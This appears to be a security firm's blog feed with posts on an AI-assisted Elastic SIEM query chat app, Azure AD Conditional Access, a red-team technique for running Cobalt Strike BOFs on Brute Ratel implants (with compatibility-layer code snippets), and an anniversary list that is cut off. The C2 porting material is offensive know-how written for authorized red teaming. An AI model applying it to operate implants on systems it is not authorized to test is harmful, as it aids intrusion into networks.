We will be presenting a brief demo of a custom chat web app that allows users to query Windows event logs using natural language and obtain results for incident handling. In our example, we used the TextDavinci-3 model from OpenAI and Elastic as a SIEM. We built the custom chat app, using vanilla JS for the client and NodeJS for the backend.

Architecture
In our design, we send the analysts question to OpenAI using their API within a custom prompt. Subsequently, the resulting Elastic Query is sent to the Elastic SIEM using its API. Lastly, the result from Elastic is returned to the user.

chat app openai api with elastic siem
Web app diagram

A: User asking in the chat
B: The web app sends the initial input, enhanced with a standard phrase, to guide the model in generating more relevant and coherent responses.
C: It gets back the response: corresponding Elasticsearch query
D: The web app sends the query to Elasticsearch, after some checks
E: Elasticsearch sends back the result to web app
F: Present the results to the user in table format

Demo

In this demo, we focused on querying a specific log source, namely the “winlogbeat” index. However, it is indeed possible to expand the scope of the query by incorporating a broader index pattern that includes a wider range of log sources, such as “Beats-*” (if we are utilizing Beats for log collectors). Another approach would be to perform a search across all available sources, assuming the implementation of the Elastic Common Schema (ECS) within Elasticsearch. For instance, if we have different log types, such as Windows event logs, Checkpoint logs, etc. and we want to retrieve these logs from a specific host name, we can utilize the “host.name” key in each log source (index). By specifying the desired host name, we can filter the logs and retrieve the relevant information from the respective log sources.

ecs example
Working with ECS

Deep drive
Below, we will go into detail on how we built the application.
To create this web app, the first thing we need is an API key from OpenAI. This key will give us access to the gpt-3 models and their functionalities.

create openai api key
Creating OpenAI API key

Next, we will utilize the OpenAI playground to experiment and interact with the TextDavinci-3 model. In this particular example, we made an effort to craft an optimal prompt that would yield the most desirable responses. Fortunately, the TextDavinci-3 model proved to be the ideal choice, providing us with excellent results. Also, the OpenAI API allows you to control the behavior of the language model by adjusting certain parameters:

  • Temperature: The temperature parameter controls the randomness of the model’s output. A higher temperature, like 0.8, makes the output more creative and random, while a lower temperature, like 0.1, makes it more focused and deterministic.
  • Max Tokens: The max tokens parameter allows you to limit the length of the model’s response. You can set a specific number of tokens to restrict the length of the generated text. Be aware that setting an extremely low value may result in the response being cut off and not making sense to the user.
  • Frequency Penalty: The frequency penalty parameter allows you to control the repetitiveness of the model’s responses. By increasing the frequency penalty (e.g., setting it to a value higher than 0), you can discourage the model from repeating the same phrases or words in its output.
  • Top P (Top Probability): The top_p parameter, also known as nucleus sampling or top probability, sets a threshold for the cumulative probability distribution of the model’s next-word predictions. Instead of sampling from the entire probability distribution, the model only considers the most probable tokens whose cumulative probability exceeds the top_p value. This helps to narrow down the possibilities and generate more focused and coherent responses.
  • Presence Penalty: The presence penalty parameter allows you to encourage or discourage the model from including specific words or phrases in its response. By increasing the presence penalty (e.g., setting it to a positive value), you can make the model avoid certain words or topics. Conversely, setting a negative value can encourage the model to include specific words or phrases.

Following that, we can proceed to export the code based on the programming language we are using for our chat web app. This will allow us to obtain the necessary code snippets tailored to our preferred language.

playground openai
OpenAI Playground code snippet

Also, it is worth mentioning that we stumbled upon an impressive attempt at dsltranslate.com, where you can check how ChatGPT translate a search sentence into an Elasticsearch DSL query (even SQL).

Returning to our experimental use case, our web app consists of two components: the client side and the server side. On the client side, we have a chat user interface (UI) where users can input their questions or queries. These questions are then sent to the server side for processing.

client custom chat app elasticsearch openaiai
UI chat

On the server side, we enhance the user’s questions by combining them with a predefined text to create a prompt. This prompt is then sent to the OpenAI API for processing and generating a response.

prompt send to openai
Backend code snippet- prompt OpenAI api

Once we receive the response, we perform some basic checks, such as verifying if it is a valid JSON object, before forwarding the query to our SIEM API, which in this case is Elastic. Finally, we send the reply back to the client by transforming the JSON response into an HTML table format.

Discussion
But many of the responses from OpenAI API are not correct…
You are absolutely right. Not all responses from the OpenAI API can be guaranteed to be correct or accurate. Fine-tuning the model is a valuable approach to improve the accuracy of the generated results.

Fine-tuning involves training the pre-trained language models like GPT-3 and TextDavinci-3 on specific datasets that are relevant to the desired task or domain. By providing a training dataset specific to our use case, we can enable the model to learn from and adapt to the context, leading to more accurate and tailored responses.

To initiate the fine-tuning process, we would need to prepare a training dataset comprising a minimum of 500 examples in any text format. This data set should cover a diverse range of scenarios and queries related to our specific use case. By training the model on this dataset, we can enhance its performance and ensure that it generates more accurate and contextually appropriate responses for our application.
Example:

{"prompt": "show me the last 5 logs from the user sotos", "completion": " {\n\"query\": {\n    \"match\": {\n..... "}
{"prompt": "...........", "completion": "................."}
....

Even if we invest efforts in fine-tuning the model and striving for improvement, it is important to acknowledge that new versions and functionalities are regularly integrated into the Elasticsearch query language. It is worth noting that the knowledge perspective of ChatGPT is limited to information available up until September 2021. Similar to numerous companies, Elastic has recently developed a plugin that enable ChatGPT to tap into Elastic’s up-to-date knowledge base and provide assistance with the latest features introduced by Elastic.

Everything seems perfect so far, but…what about security and privacy of data?

Indeed, privacy and security are important concerns when dealing with sensitive data, especially in scenarios where queries or requests might expose potentially confidential information. In the described scenario, the actual logs are not shared with OpenAI, but the queries themselves reveal certain information, such as specific usernames or host names (ex. “find the logs for the user mitsos” or “show me all the failed logon attempts from the host WIN-SOTO.”).

In accordance with the data usage policies of OpenAI API (in contrast to ChatGPT), it refrains from utilizing the data provided through its API to train its models or enhance its offerings. It is worth noting, however, that data transmitted to their APIs is handled by servers situated in the United States, and OpenAI retains the data you submit via the API for a period of up to 30 days for the purpose of monitoring potential abuses. Nevertheless, OpenAI grants you the ability to choose not to participate in this monitoring, thereby ensuring that your data remains neither stored nor processed. To exercise this option, you can make use of the provided form. Consequently, each API call initiates and concludes your data’s lifecycle. The data is transmitted through the API, and the API call’s response contains the resulting output. It does not retain or preserve any data transmitted during successive API requests.

In conclusion, by leveraging OpenAI’s language processing capabilities, organizations can empower security analysts to express their query intentions in a natural language format. This approach streamlines the SIEM query creation process, enhances collaboration, and improves the accuracy and effectiveness of security monitoring and incident response. With OpenAI’s assistance, bridging the gap between human language and SIEM query language becomes an achievable reality in the ever-evolving landscape of cybersecurity. Last but not least, the privacy issue surrounding ChatGPT and OpenAI API usage raises a significant point that necessitates thoughtful consideration, before creating new implementations.

nikos sam

Nikos Samartzopoulos

Nikos is a Senior Consultant in the SOC Engineer Team. With a strong background in data field and extensive knowledge of Elastic Stack, Nikos has cultivated his abilities in architecting, deploying, and overseeing Elastic SIEM systems that excel in monitoring, detecting, and swiftly responding to security incidents.

Enforce Zero Trust in Microsoft 365 – Part 3: Introduction to Conditional Access

24 May 2023 at 07:00
Enforce Zero Trust in Microsoft 365 - Part 3: Introduction to Conditional Access

This blog post is the third blog post of a series dedicated to Zero Trust security in Microsoft 365.

In the first two blog posts, we set the basics by going over the free features of Azure AD that can be implemented in an organization that starts its Zero Trust journey in Microsoft 365. We went over the Security Defaults, the per-user MFA settings and some Azure AD settings that allowed us to improve our default security posture when we create a Microsoft 365 environment.

Previous blog posts:

Introduction

In this blog post, we will see what Azure AD Conditional Access is, how it can be used to further improve security and introduce its integration capabilities with other services.

As a reminder, our organization has just started with Microsoft 365. However, we have decided to go for Microsoft 365 for our production environment. Therefore, we want to have a look at a more advanced feature, Azure AD Conditional Access policies. This feature requires an Azure AD Premium P1 license which comes as a standalone license or which is also included in some Microsoft 365 licenses (Microsoft 365 E3/A3/G3/F1/F3, Enterprise Mobility & Security E3, Microsoft 365 Business Premium, and higher licenses). Note that one license should be assigned to each user in scope of any Conditional Access policies.

Azure AD Conditional Access allows to take identity-driven signals to make decisions and enforce policies. They can be seen as if-then statements. For instance, if a user wants to access SharePoint Online, which is a Microsoft cloud application that can be integrated in such policies, the user, more specifically, the user’s request, is required to meet specific requirements, defined in those policies. Let’s now see what the capabilities of those policies are.

Conditional Access

This part will be more theoretical to make sure everyone has the basics. Therefore, if you are already familiar to Azure AD Conditional Access Policies, you can directly jump to the next section for the implementation where we go over some prerequisites and important actions that need to be done to avoid troubles when setting up those policies based on our hands-on experience.

Conditional Access signals

As we have seen, signals will be considered to make a decision. It is possible to configure the following signals:

  • User, group membership or workload identities (also known as service principals or managed identities in Azure): It is possible to target or exclude specific users, groups, or workload identities from a Conditional Access policy;
  • Cloud apps or actions: Specific cloud applications such as Office 365, the Microsoft Azure Management, Microsoft Teams applications, etc. can be targeted by a policy. Moreover, specific user actions like registering security information (registering to MFA or Self-Service Password Reset) or joining devices can be included as well. Finally, authentication context can also be included. Authentication contexts are a bit different as they can be used to protect specific sensitive resources accessed by users or user actions in the environment. We will discuss authentication contexts in details in later blog post;
  • Conditions: With an Azure AD Premium P1 license, specific conditions can be set. This includes:
    • The device platforms: Android, iPhone, Windows Phone, Windows, macOS and Linux;
    • The locations: Conditional Access works with Named Locations which can include country/countries or IP address(es) that can be seen as trusted or untrusted;
    • The client apps: client apps which support modern authentication: Browser and Mobile apps and desktop clients; and legacy authentication clients: Exchange ActiveSync clients and other clients;
    • Filter for devices: allows to target or exclude devices based on their attributes such as compliance status in the device management solution, if the device is managed in Microsoft Endpoint Manager or on-premises, or registered in Azure AD, as well as custom attributes that have been set on devices;
    • Note that these conditions need to be all matched for the policy to apply. If a condition such as the location is excluded and match an attempt to access an application, the policy will not apply. Finally, if multiple policies matched, they will all apply, and access controls will be combined (the most restrictive action will be applied in case of conflicts).

Conditional Access access controls

Then, we have the access controls which are divided into two main categories, the “grant” and the “session” controls. These access controls define the “then do this” part of the Conditional Access policy (if all conditions have matched as mentioned previously). They can be used to allow or block access, require MFA, require the device to be compliant or managed as well as other more specific controls.

Grant controls

  • Block access: if all conditions have matched, then block access;
  • Grant access: if all conditions have matched, then grant access and optionally apply one or more of the following controls:
    • No controls are checked: Single-Factor Authentication is allowed, and no other access controls are required;
    • Require Multi-Factor Authentications;
    • Require authentication strength: allows to specify which authentication method is required for accessing the application;
    • Require device to be marked as compliant: this control requires devices to be compliant in Intune. If the device is not compliant, the user will be prompted to make the device compliant;
    • Require Hybrid Azure AD joined devices: this control requires devices to be hybrid Azure AD joined meaning that devices must be joined from an on-premises Active Directory. This should be used if devices are properly managed on-premises with Group Policy Objects or Microsoft Endpoint Configuration Manager, formerly SCCM, for example;
    • Require approved client apps: approved client apps are defined by Microsoft and represent applications that supports modern authentication;
    • Require app protection policy: app protection policies can be configured in Microsoft Intune as part of Mobile Application Management. This control does not require mobile devices to be enrolled in Intune and therefore work with bring-your-own-device (BYOD) scenarios;
    • Require password change;
    • For multiple controls (when multiple of the aforementioned controls are selected):
      • Require all the selected controls;
      • Require one of the selected controls.

Session controls

  • Use app enforced restrictions: app enforced restrictions require Azure AD to pass device information to the selected cloud app to know if a connection is from a compliant or domain-joined device to adapt the user experience. This control only works with Office 365, SharePoint Online and Exchange Online. We will see later how this control can be used;
  • Use Conditional Access App Control: this is the topic of a later blog post, but it allows to enforce specific controls for different cloud apps with Microsoft Defender for Cloud Apps;
  • Sign-in frequency: this control defines how often users are required to sign in again every (x hours or days). The default period is 90 days;
  • Persistent browser session: when a persistent session is allowed, users remain signed in even after closing and reopening their browser window;
  • Customize continuous access evaluation: continuous access evaluation (CAE) allows access tokens to be revoked based on specific critical events in near real time. This control can be used to disable CAE. Indeed, CAE is enabled by default in most cases (CAE migration);
  • Disable resilience defaults: when enabled, which is the case by default, this setting allows to extend access to existing session while enforcing Conditional Access policies. If the policy can’t be evaluated, access is determined by resilience settings. On the other hand, if disabled, access is denied once the session expires;
  • Require token protection for sign-in sessions: this new capability has been designed to reduce attacks using token theft (stealing a token, hijacking or replay attack) by creating a cryptographically secure tie between the token and the device it is issued to. At the time of writing, token protection is in preview and only supports desktop applications accessing Exchange Online and SharePoint Online on Windows devices. Other scenarios will be blocked. More information can be found here.

Conditional Access implementation

Before getting started with the implementation of Conditional Access policies, there are a few important considerations. Indeed, the following points might determine if our Zero Trust journey is a success or a failure in certain circumstances.

Per-user MFA settings

If you decided to go for the per-user MFA settings during the first blog post, you might consider the following:

  • As mentioned before, Conditional Access policies can be used to enforce a sign-in frequency. However, this can also be achieved using the ‘remember multi-authentication’ setting. If both settings are configured, the sign-in frequency enforced on end users will be a mix of both configuration and will therefore lead to prompting users unexpectedly;
  • If trusted IPs, which require an Azure AD Premium P1 license, have been configured in the per-user MFA settings, they will conflict with named locations in Azure AD Conditional Access. Named locations allow you to define locations based on countries or IP address ranges that can then be used to allow or block access in policies. Besides that, if possible, named locations should be used because they allow more fine-grained configurations as they do not automatically apply to all users and in all scenarios;
  • Finally, before enforcing MFA with Conditional Access policies, all users should have their MFA status set to disabled.

Security Defaults

Moreover, if you opted for the Security Defaults, it needs to be disabled as they can’t be used together.

How and where to start?

Now that we have some concepts about Conditional Access and some considerations for the implementation, we can start with planning the implementation of our policies. First, we need to ensure that we know what we want to achieve and what the current situation is. In our case, we first want to enforce MFA for all users to prevent brute force and protect against simple phishing attacks.

However, there might be some user accounts used as services accounts in our environment, such as the on-premises directory synchronization account for hybrid deployments, which can’t perform multi-factor authentication. Therefore, we recommend identifying these accounts and excluding them from the Conditional Access policy. However, because MFA would not be enforced on these accounts, they are inherently less secure and prone to brute force attacks. For that purpose, Named Locations could be used to only allow these service accounts to login from a defined trusted location such as the on-premises network (this now requires an additional license for each workload identity that you want to protect: Microsoft Entra Workload Identities license). Except for the directory synchronization account, we do not recommend the use of user accounts as service accounts. Other solutions are provided by Microsoft to manage applications in Azure in a more secure way.

Our first policy could be configured as follows (note that using a naming convention for Conditional Access policies is a best practice as it eases management):

1. Assign the policy to all users (which includes all tenant members as well as external users) and exclude service accounts (emergency/break-the-glass accounts might also need to be excluded):

Conditional Access policy assignments
Assignments

2. Enforce the policy for all cloud applications:

Cloud applications
Cloud applications

3. Require MFA and enforce a sign-in frequency of 7 days:

Access controls
Access controls

4. Configure the policy in report-only first

Report-only mode
Report-only mode

We always recommend configuring Conditional Access policies in report-only mode before enabling them. The report-only feature will generate logs the same way as if the policies were enabled. This will allow us to assess any potential impact on service accounts, on users, etc. After a few weeks, if no impact has been discovered, the policy can be switched to ‘On’. Note that there might be some cases where you may want to shorten or even skip this validation period.

These logs can be easily access in the ‘Insights and reporting‘ panel in Conditional Access:

Conditional Access Insights and reporting
Conditional Access Insights and reporting

Conclusion

In this third blog post, we learned about Conditional Access policies by going over a quick introduction on Conditional Access signals and access controls. Then, we went over some implementation considerations to make sure our Zero Trust journey is a success by preventing unexpected behaviors and any impact on end users. Finally, we implemented our very first Conditional Access policy to require Multi-Factor Authentication on all users except on selected service accounts (which is not the best approach as explained above).

If you are interested to know how NVISO can help you planning your Conditional Access policies deployment and/or support you during the implementation, feel free to reach out or to check our website.

In my next blog post, we will see which policies can be created to enforce additional access controls without requiring user devices to be managed in Intune to further protect our environment.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Introducing CS2BR pt. I – How we enabled Brute Ratel Badgers to run Cobalt Strike BOFs

15 May 2023 at 07:00

If you know all about CS, BRC4 and BOFs you might want to skip this introduction and get right into the problem statement. You can also jump right to the solution.

Introduction

When we conduct Red Team assessments at NVISO, we employ a wide variety of proprietary and open source tools. One central component in these assessments is the command & control (C2) framework we use to remotely interact with compromised machines and move laterally through our targets’ networks. They usually feature a C2 server for central access, implants (analogous to bots in botnets) that execute commands, and client interfaces that allow red team operators to interact with the implants. Among others, there are two popular C2 frameworks that we use: Cobalt Strike and Brute Ratel C4.

Both C2s are proprietary and they have a lot of features in common. A particular capability they share is execution of beacon object files (BOFs). Normally you work with object files during compilation of C and C++ programs as they contain the compiled code of individual C/C++ source files and are not directly executable.

CS and BRC4 provide a mechanism to send BOFs to implants and execute their code on the remote machines. And the best thing about it is: one can write their own BOFs and have implants execute them. This comes with quite a set of benefits:

  • Implants don’t need to implement a lot of capabilities as those capabilities can be streamed and executed on demand, reducing the implant’s footprint.
  • Using custom BOFs, operators have finer control over the exact way an implant interacts with the target system. They can choose to implement new features or operate more covertly and OPSEC-safe.
  • While the C2s might be proprietary, BOFs can be open-source and shared with everyone.

There are many open-source BOFs available, such as TrustedSec’s CS-Situational-Awareness, that can easily be used in various C2s like CS and sliver. Nearly all of these BOFs use Cobalt Strike’s de-facto BOF API standard – which isn’t compatible with Brute Ratel’s BOF API. Thus, the vast majority of available BOFs is incompatible with BRC4.

Turns out there are only very few BRC4 BOFs!

In this blog post, we present an approach to solve this problem that enables Brute Ratel’s implants (“badgers”) to run BOFs written for Cobalt Strike. The tool we developed based on this approach will be presented in a follow-up blog post.

I. So what’s the exact problem?

In theory any BOF can be executed by either C2 framework so long as they don’t make any use of the C2-specific APIs. Practically, this doesn’t make much sense since using these APIs is required for basic tasks such as sending back information to operators.

The following paragraphs break down both BOF APIs in order to help understand how they’re incompatible.

Cobalt Strike’s BOF C API

Cobalt Strike BOF C API

Cobalt Strike splits its APIs into roughly four distinct groups:

  • Data Parser API: provides utilities to parse data passed to the BOF. This allows BOFs to receive arbitrary data as input, such as regular string-based values but also arbitrary binary data like files.
  • Output API: lets BOFs output raw buffers and format output. The output is sent back to operators.
  • Format API: allows BOFs to format output in buffers for later transmission.
  • Internal APIs: feature several utilities related to user impersonation, privileges and process injection. BRC4 doesn’t currently have an equivalent API.

Furthermore, the signature of CS BOFs entrypoints is void go(char*, int) and explicitly expects binary data to be passed and to be used with the Data Parser API.

Brute Ratel C4’s BOF C API

Brute Ratel BOF C API

Brute Ratel C4’s API on the other hand comes as a loose list that I grouped in this diagram for simplicity:

  • Output API: contains output printf-like functions for regular ANSI-C strings and wide-char strings.
  • String API: features various strlen and strcmp functions for regular ANSI-C strings and wide-char strings.
  • Memory API provides convenient memory-related functions for allocating, freeing, copying and populating buffers.

The signature of BRC4 BOF entrypoints is void coffee(char**, int, WCHAR**) and explicitely expects string-based inputs (similar to regular executable’s void main(int argc, char* argv[])).

Comparison & Conclusion

When comparing their APIs, it becomes apparent that CS and BRC4 follow different approaches to their APIs:

  • While both C2s provide some convenience APIs, Cobalt Strike’s APIs feature a higher abstraction level. As a result, CS doesn’t only feature an API dedicated to output (as does BRC4) but also one for formatting output.
  • CS provides advanced APIs (e.g. the “internal” ones) while BRC4 provides mostly low-level APIs.
  • Both differ greatly in their approach to passing inputs to BOFs: Cobalt Strike allows passing arbitrary binary data and provides a separate API for this task while BRC4 sticks to the traditional main entrypoint and its GUI only allows operators to pass strings to BOFs.
CS BOFs are (almost) the same as BRC4 BOFs - or at least BRC4 would like you to think that.

Actually BRC4’s documentation makes porting BOFs from CS to BRC4 look like an easy task. Simply trying to map the CS’s BOF API to BRC4’s shows that this is a more intricate task:

Cobalt Strike and Bute Ratel C4 BOF API mapping

As you can see, there are only very few CS APIs that (more or less) can be mapped to BRC4’s APIs. What are the implications for porting CS BOFs to BRC4 then? Well, it’s going to require some engineering.

II. Working out a solution

Now that we know how BRC4’s and CS’s BOF APIs are different from each other, we can work out a solution. Well, I’d love to tell you that that was the approach I took: read up on the problem’s intricacies first and then work out a well-structured and thought out solution. Things went a little different though, and I’d like to show you.

Approach 1: The naïve way

My first approach at porting BOFs from CS to BRC4 was based on the BRC4 documentation and involved only three steps:

  • Replace the go(char*, int) entrypoint with coffee(char**, int, WCHAR**).
  • Remove CS API imports (“beacon.h”) and add BRC4 API imports (“badger_exports.h”).
  • Replace uses of CS APIs with BRC4 APIs.

That looks easy to do! So let’s test this using the DsGetDcNameA example they posted in the documentation:

BRC4 DsGetDcNameA BOF

Nice, that worked very well! How about a real world example of an open source BOF: Outflank’s Winver BOF grabs the exact windows version of the victim machine. Again we replace the entrypoint, API imports and API uses:

#include "badger_exports.h"

//snip

VOID coffee(char** Args, int len, WCHAR** dispatch) {
	// snip
	dwUBR = ReadUBRFromRegistry();
	if (dwUBR != 0) {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u.%u\n", chOSMajorMinor, pPEB->OSBuildNumber, dwUBR);
	}
	else {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u\n", chOSMajorMinor, pPEB->OSBuildNumber);
	}
	
	return;
}
Common output with BOFs: not much to work with!

Running this gives us… nothing! This is a problem you’ll encounter when working with BOFs: you won’t receive any feedback when they aren’t executed or crash, making debugging and identifying the root cause just a bit harder.

But what was the problem in this case? Well, I got stuck for a bit at this point and after digging into the compiled BOF I noticed that there were WinAPI calls in the code that were not explicitly declared as imports:

DWORD ReadUBRFromRegistry() {
	//snip
	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");

Cobalt Strike’s BOF documentation says that “GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are available within BOF files” and don’t need to be explicitly imported by BOFs. This doesn’t apply to BRC4 though so imports for those need to be added:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleA (LPCSTR lpModuleName);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleW (LPCWSTR lpModuleName);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryW (LPCWSTR lpLibFileName);
WINBASEAPI BOOL  WINAPI KERNEL32$FreeLibrary (HMODULE hLibModule);

#ifdef GetProcAddress
#undef GetProcAddress
#endif
#define GetProcAddress KERNEL32$GetProcAddress
#ifdef GetModuleHandleA
#undef GetModuleHandleA
#endif
#define GetModuleHandleA KERNEL32$GetModuleHandleA
#ifdef GetModuleHandleW
#undef GetModuleHandleW
#endif
#define GetModuleHandleW KERNEL32$GetModuleHandleW
#ifdef LoadLibraryA
#undef LoadLibraryA
#endif
#define LoadLibraryA KERNEL32$LoadLibraryA
#ifdef LoadLibraryW
#undef LoadLibraryW
#endif
#define LoadLibraryW KERNEL32$LoadLibraryW
#ifdef FreeLibrary
#undef FreeLibrary
#endif
#define FreeLibrary KERNEL32$FreeLibrary

Note that the macros allow us to leave the original function calls in the BOF untouched. If we didn’t do that, we would need to prepend KERNEL32$ to every call of the functions listed above.

After adding those and recompiling, we can run the BOF again and now it runs just fine:

Running a CS BOF in BRC4 after adding default imports

That’s great! However this approach is pretty limited. Let’s have a look at some of its shortcomings.

Caveat

The naïve approach works great for very simple BOFs that don’t use any of CS’s higher-level APIs. Many of the advanced BOFs use some of those APIs though.

Let’s examine TrustedSec’s sc_enum as it’s a very useful BOF and great example: it allows an operator to enumerate Windows services on a target machine. If we were to perform our simple 3-step approach again we’d hit a roadblock:

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	const char * hostname = NULL;
	const char * servicename = NULL;
	DWORD result = ERROR_SUCCESS;
	datap parser;
	init_enums();
	BeaconDataParse(&parser, Buffer, Length);
	hostname = BeaconDataExtract(&parser, NULL);
	//snip
	if ((gscManager = ADVAPI32$OpenSCManagerA(hostname, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT | GENERIC_READ)) == NULL)

You can see that this BOF takes the hostname parameter from the “Data Parser API” (BeaconDataExtract) that isn’t present in BRC4. There’s no equivalent to this API in BRC4.

At this point I figured that instead of coming up with some hacky fix I’d work out a proper solution that works more reliably and is more flexible: after all, I didn’t want to manually edit all the BOFs I use on a regular basis and troubleshoot API replacements.

Approach 2: True Compatibility

Since replacing APIs was already tricky in some cases and just impossible for higher-level APIs, I was searching for a solution that allowed me to (ideally) not touch any API calls in BOFs’ source code at all. There are two challenges to solve: allowing BOFs to call CS APIs and transforming their entrypoint to BRC4’s signature.

Compatibility Layer

Luckily, I wasn’t the first one to attempt this: TrustedSec’s COFFLoader is able to execute arbitrary compiled CS BOFs which means that it treats BOFs as blackboxes and introduces a compatibility layer that implements the CS BOF API. With this approach in mind I modelled the following design:

The compatibility layer

The idea is simple:

The CS API definitions included in BOF source code, usually called beacon.h, are replaced with stubs that don’t import the actual API but use the compatibility layer code. The compatibility layer imports the BRC4 BOF API and calls it as needed. COFFLoader’s compatibility layer is very readable and straight-forward to understand. It implements all the higher-level concepts missing in the BRC4 API. One only needs to copy their implementation and swap out some bits that require imports, such as string or memory utilities. They should be replaced with BRC4’s equivalents (e.g. replacing memcpy with BadgerMemcpy) or, less ideally, with MSVCRT imports (e.g. vsnprintf for string formatting). For example, the BeaconFormatAlloc API can be implemented as follows:

void BeaconFormatAlloc(formatp* format, int maxsz) {
	if (format == NULL) return;
	format->original = (char*)BadgerAlloc(maxsz);
	format->buffer = format->original;
	format->length = 0;
	format->size = maxsz;
}

For the sake of completeness: the compatibility layer should also include imports to the WinAPI functions included by default in CS (GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary).

As a result, following this approach won’t tamper with the BOFs’ original logic but lets us implement the CS API ourselves, which in turn allows our BOFs to run in BRC4 now. Well, almost: the entrypoint isn’t compatible yet, and that’s not necessarily trivial.

Wrapping the Entrypoint

As we saw in the first attempt, porting the entrypoint from CS to BRC4 BOFs isn’t really tricky as we only need to change the function signature. It does get tricky if our BOF uses its start parameters (and thereby CS’s Data Parser API) though:

This API allows passing arbitrary data to CS BOFs. To achieve this, CS BOFs can ship with CNA scripts that allow the CS client to query input data (such as files) from operators, which the CNA assembles into a binary blob. This blob is sent along with the BOF itself to the implant (“beacon”). The BeaconData* APIs (which make up the Data Parser API) allow BOFs to disassemble this blob into structured data again. BRC4 doesn’t have this scripting capability and its BOF entrypoint only allows passing string-based arguments instead.

Again, COFFLoader solved the same problem before: it comes with a Python script that encodes arbitrary input into a hex-string that can be deserialized to a byte-buffer and passed to CS BOF entrypoints. Following the same approach, I worked out the following rather simple addition to the design above:

Wrapped entrypoint

Once more, the idea is simple:

Operators encode their inputs to string and pass it to the BOF using BRC4’s coffexec command. A minimal BRC4 entrypoint is appended to the BOF source code. This entrypoint decodes supplied input strings to a buffer and passes that buffer to the original CS entrypoint.

Summary

In essence, this approach consists of only three steps:

  1. Replace CS API imports with compatibility layer implementations
  2. Wrap CS entrypoint with a custom BRC4 entrypoint that prepares input for the Data parser API
  3. Manually encode execution parameters

This still isn’t a perfect solution but leaves us with a couple of pros and cons:

  • ✅ Doesn’t touch the original BOF’s logic
  • ✅ Flexibility: the same approach works for most (if not all) BOFs out there
  • ❌ Requires (somewhat) elaborate compatibility implementation
  • ❌ Requires some way to inject the compatibility layer (e.g. via source code)

III. Coming up next

Now that we have a solid and flexible approach to run CS BOFs on BRC4, there’s only one thing missing – a tool that automates it all!

We will publish CS2BR – a tool that does just that – as an open source project on Github along with a follow-up blogpost all about it soon. Stay tuned!

Moritz Thomas

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

We’re celebrating our 10th anniversary!

15 May 2023 at 06:54


From 5 people to almost 250 people. From working from our founders’ apartment to five offices in four countries. From an unknown challenger to being a reference in multiple fields in cyber security.

As a company, NVISO has come a long way since 2013 and we want to take a moment to celebrate what we have accomplished together so far.

NVISO celebrates a decade of European cyber security expertise

In 2013, NVISO was founded by five young security professionals with a dream:
To build a home and a hub for cyber security experts, here in the heart of Europe.

  • A team built on strong values.
  • A place that prioritizes personal growth and encourages everyone to innovate.
  • A community of experts that strives to be the best at what they do.
  • All working towards the mission of protecting European society from potentially devastating cyber attacks.

Together, we made it a reality!

This would not have been possible without the trust of our clients & partners and, most crucially, the dedication of every single NVISO bird. Thank you all!

Over the past decade, our team has made significant contributions to the field of cybersecurity through research and innovative solutions.

So, let’s take a trip down memory lane and revisit ten of the most influential articles from our blog!

  1. ApkScan
    Back in 2013, our first research project was a scanner for APKs; that Android malware analysis tool was very successful, being cited in academic papers, and helped us rapidly build knowledge and experience with what was then a relatively new challenge, mobile security. (Read more)
  1. Intercept Flutter traffic on iOS and Android
    Mobile security remains one of our big focus points, and this blogpost offers practical guidance for other testers on how to bypass SSL pinning, intercept HTTPS traffic, and use ProxyDroid during their mobile security assessments. (Read more)
  1. My journey reaching #1 on Hack The Box Belgium – 10 tips, tricks and lessons learned
    Inspiring others by sharing a personal success story – in this case, reaching the #1 spot on Hack The Box Belgium – is something we really encourage our colleagues to do. Combining hands-on tips with a few motivational memes mixed was the recipe for this popular & often-shared blog post! (Read more)

  2. Painless Cuckoo Sandbox Installation
    Sharing hands-on practical tutorials on how to solve a certain problem we had to deal with ourselves, has proven to be a good source for blog posts: practical tutorials where we share source code are some of the most searched blog posts we publish. This particular blog post explains how to set up a Cuckoo sandbox for analyzing malware samples, which is useful for blue team members who need to analyze a suspected malware sample without submitting it to online malware analysis services that may alert adversaries. (Read more)
  1. A practical guide to RFID badge copying
    Deciding which information (not) to publish is always an important balancing act: on one hand, we want to share important information about vulnerabilities as much as possible, while also protecting potential victims without encouraging illicit use of the information. We decide to share this particular blog post to raise awareness about the potential security risks associated with RFID card reading systems, which are often the sole factor of security that prevents unauthorized access to buildings, server rooms, and offices. The post demonstrates how easy it is to clone and abuse RFID cards using specialized hardware, such as the Proxmark3, when the card reader security mechanism is insufficiently secured. (Read more)

  2. DeTT&CT: Mapping detection to MITRE ATT&CK 
    Detailed and hands-on guide on mapping your detection capabilities to MITRE ATT&CK using MITRE DeTT&CT. Using this it becomes easier to build and maintain rules, and spot your blind spots! (Read more)

  3. Another spin to Gamification: how we used Gather.town to build a (great!) Cyber Security Game
    People are at the heart of cybersecurity. In this blog post, we outline how we crafted an – if we may say so ourselves – fun and informative game using Gather.town to promote cybersecurity awareness, and tell you how you can too. (Read more)

  4. PowerShell Inside a Certificate? – Part 1
    Didier Stevens outlines in this blog post how we crafted YARA detection rules that don’t just detect things we know are bad, but also checks whether things actually have the format we expect them to. This way we found some PowerShell code hidden in Certificate files. (Read more)

  5. Detecting DDE in MS Office documents
